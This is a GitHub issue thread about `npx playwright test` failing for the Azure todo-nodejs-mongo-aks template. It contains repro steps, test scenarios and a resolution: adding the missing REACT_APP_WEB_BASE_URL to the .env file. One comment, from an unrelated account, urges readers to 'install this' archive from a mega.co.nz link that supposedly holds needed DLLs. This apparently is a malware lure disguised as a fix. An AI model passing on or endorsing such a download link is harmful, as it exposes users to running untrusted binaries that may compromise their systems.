### ISSUE TITLE
Fail to run `npx playwright test` for `todo-nodejs-mongo-aks`

### ISSUE THREAD

**Issue by Menghua1** [Azure/azure-dev#4349]
**Describe the issue:**
Running the `npx playwright test` command fails with the following error message:
![image](https://github.com/user-attachments/assets/ab897800-d319-4235-8485-cd2d73484b8c)

**Repro Steps:**
1. Login in with command: `azd auth login`.
2. Run command: `azd init -t todo-nodejs-mongo-aks -b staging`.
3. Run command: `azd up`.
4. Run command: `cd tests`.
5. Run command: `npm i && npx playwright install`.
6. Run command: `npx playwright test`.

**Environment:**
- Template: `todo-nodejs-mongo-aks`.
- OS: Windows, MacOS.
- Azd version: azd version 1.11.0-beta.1-pr.4140256 (commit b6402defbf4c4210855e14c114988010e0a51ed7) and azd version 1.11.0-beta.1-daily.4152592 (commit e2ff8ba7dcc5b3f7e883213a2315a8b275294def)

**Expected behavior:**
`npx playwright test` commands can be run successfully.

@jongio for notification.

**Comment by nhatlaso1** [comment]
install this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive

**Comment by Menghua1** [comment]
@jongio Yes, this issue can also be reproduced in **main**. We tested the following four scenarios and they can all be reproduced:

- **Template**: `todo-nodejs-mongo-aks`.
- **OS**: Windows, MacOS.
- **Test Scenario**: 
1. Templates under the `main` branch + azd version 1.11.0-beta.1-daily.4152592 (commit e2ff8ba7dcc5b3f7e883213a2315a8b275294def). 
2. Templates under the `main` branch + azd version 1.11.0-beta.1-pr.4140256 (commit b6402defbf4c4210855e14c114988010e0a51ed7). 
3. Templates under the `staging` branch + azd version 1.11.0-beta.1-daily.4152592 (commit e2ff8ba7dcc5b3f7e883213a2315a8b275294def). 
4. Templates under the `staging` branch + azd version 1.11.0-beta.1-pr.4140256 (commit b6402defbf4c4210855e14c114988010e0a51ed7).

**Comment by rajeshkamal5050** [comment]
Doubt playwright tests would work for the AKS template give our sub/tenants networking policies. cc @wbreza

**Comment by Menghua1** [comment]
@rajeshkamal5050 After investigation, the `REACT_APP_WEB_BASE_URL` parameter was missing in the default `.azure` environment. After adding the `REACT_APP_WEB_BASE_URL` parameter to the `.env` file, `npx playwright test` could run successfully.
![Image](https://github.com/user-attachments/assets/b8549c2c-4ba0-4897-aa4e-0e56dabf94f0)
